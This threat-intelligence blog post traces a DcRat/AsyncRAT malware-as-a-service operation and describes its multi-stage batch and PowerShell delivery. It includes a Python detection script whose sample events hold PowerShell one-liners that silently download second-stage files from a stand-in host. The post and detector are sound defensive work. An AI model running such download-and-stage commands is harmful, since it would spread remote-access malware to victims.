MALWARE AS A SERVICE OPERATION USING DCRAT & ASYNC-RAT
Threat Intelligence
5 days ago
3 min read

Nathaneal Meththananda, CEO & Founder of ZavenTrek, Offensive Security Consultant

Our Threat Hunting Framework has identified critical intelligence regarding an active Malware-as-a-Service (MaaS) operation. Leveraging advanced analytics and real-time data correlation, the framework detected and traced malicious infrastructure associated with this operation. 

Intelligence

ops1.png

Two malicious IP addresses have been identified, indicating the hosting and operation of Remote Access Trojans (RATs). This discovery highlights the presence of malicious infrastructure actively supporting unauthorized remote access activities.

Initial Investigation

Leveraging the capabilities of Censys, our analysts initiated a comprehensive investigation to trace the entirety of the malware infrastructure. By analyzing network patterns and asset associations, they were able to map the malicious ecosystem, providing critical insights into its architecture and operational reach.

ops2.png

Through the search engine platform, analysts observed anomalous open ports and labels such as 'DcRat' and references to other Remote Access Trojans (RATs).

Further analysis revealed an operational oversight by the threat actor, where the Common Name (CN) field in the SSL/TLS certificate contained their username, inadvertently exposing their identity.

ops3.png

With the username, the analysts were able to find the GitHub profile as well as the exact DCRAT malware in the repository.

ops4.png

Upon identifying the threat actor's portfolio website, analysts successfully uncovered communication channels associated with the individual, providing valuable opportunities to gain further insights into their operations.

ops5.png

Something didn't add up when the analysts saw the image below in the DCRAT GitHub repository.

ops6.png

So 'qwqdanchun' is not our threat actor: he is the main developer of this malware and is not responsible for the malware operation.

Advancing the Malware-as-a-Service Operation

In this operation, the threat actors utilized the Kodiak open-source Command and Control (C2) framework to generate payloads designed for embedding within the Remote Access Trojans (RATs). Among the recovered artifacts, analysts identified a batch script payload, offering critical insight into the adversary's tactics and techniques.

ops7.png

The PowerShell command that executes when the victim runs the batch script:

ops8.png

Malware Analysis

Upon executing the batch script generated by the Kodiak framework, the payload initiates a connection to a specified domain to download additional malicious components, including a PDF file, another batch script named 'startuppp.bat,' and several ZIP archives. This activity highlights the multi-stage delivery mechanism employed by the threat actors. 
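As an added example (not code from the original post, nor from the Kodiak or DcRat projects), the following Python detection logic runs over constructed process-creation events and flags the chain described above: a batch script spawning PowerShell that downloads further .bat, .zip or .pdf stages. The field names, file paths and the stage.invalid host are assumptions invented for the sample.

```python
import re

# Constructed sample of process-creation events (Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3980, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\invoice.bat"'},
    {"pid": 4132, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://stage.invalid/startuppp.bat','C:\\Users\\Public\\startuppp.bat')\""},
    {"pid": 4140, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"iwr http://stage.invalid/pkg.zip -OutFile C:\\Users\\Public\\pkg.zip\""},
    {"pid": 5001, "ppid": 800, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},                      # benign: no download
    {"pid": 5090, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5100, "ppid": 5090, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"iwr http://intranet.invalid/report.pdf -OutFile C:\\tmp\\r.pdf\""},
]

# Download primitives commonly seen in one-liners, and URLs ending in second-stage file types.
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
STAGE_URL_RE = re.compile(r"https?://[^\s'\"]+?\.(?:bat|zip|pdf)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

def is_powershell(event):
    return event["image"].lower().endswith("powershell.exe")

def parent_batch(event, by_pid):
    """Return the .bat path if the parent is cmd.exe running a batch script, else None."""
    parent = by_pid.get(event["ppid"])
    if not parent or not parent["image"].lower().endswith("cmd.exe"):
        return None
    m = re.search(r"[\w:\\\-. ]+\.bat\b", parent["cmdline"], re.I)
    return m.group(0).strip() if m else None

def find_staged_downloads(events):
    """Flag PowerShell children of a batch script that fetch .bat/.zip/.pdf second stages."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not is_powershell(e) or not DOWNLOAD_RE.search(e["cmdline"]):
            continue
        urls = STAGE_URL_RE.findall(e["cmdline"])
        bat = parent_batch(e, by_pid)
        if urls and bat:   # full chain: batch script -> PowerShell -> staged download
            alerts.append({"pid": e["pid"], "batch": bat, "urls": urls,
                           "hidden": bool(HIDDEN_RE.search(e["cmdline"]))})
    return alerts
```

The explorer-spawned PDF download is deliberately left unflagged so the rule keys on the batch-to-PowerShell parent chain rather than on downloads alone.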

ops9.png

The domain the threat actors use to download the second-stage payload onto the victim's machine:

ops10.png

Conclusion

The investigation revealed a sophisticated Malware-as-a-Service (MaaS) operation leveraging the Kodiak open-source Command and Control (C2) framework to deploy Remote Access Trojans (RATs) and associated payloads. Analysts uncovered critical intelligence, including the identification of malicious IP addresses, open ports with RAT indicators, and operational missteps by the threat actor, such as exposing their username in SSL/TLS certificate fields.

Furthermore, the threat actor’s infrastructure included a portfolio website and accessible communication channels, providing deeper insights into their operations. The payload analysis demonstrated a multi-stage infection strategy, involving the download of additional malicious files such as batch scripts, PDFs, and compressed archives.

These findings underscore the advanced tactics and adaptive methodologies employed by the threat actor, reinforcing the necessity of robust threat hunting and proactive security measures to mitigate such threats. This intelligence offers actionable insights to enhance organizational defenses and disrupt malicious operations effectively.

Secualyze Copyright 2024. Developed by Vebula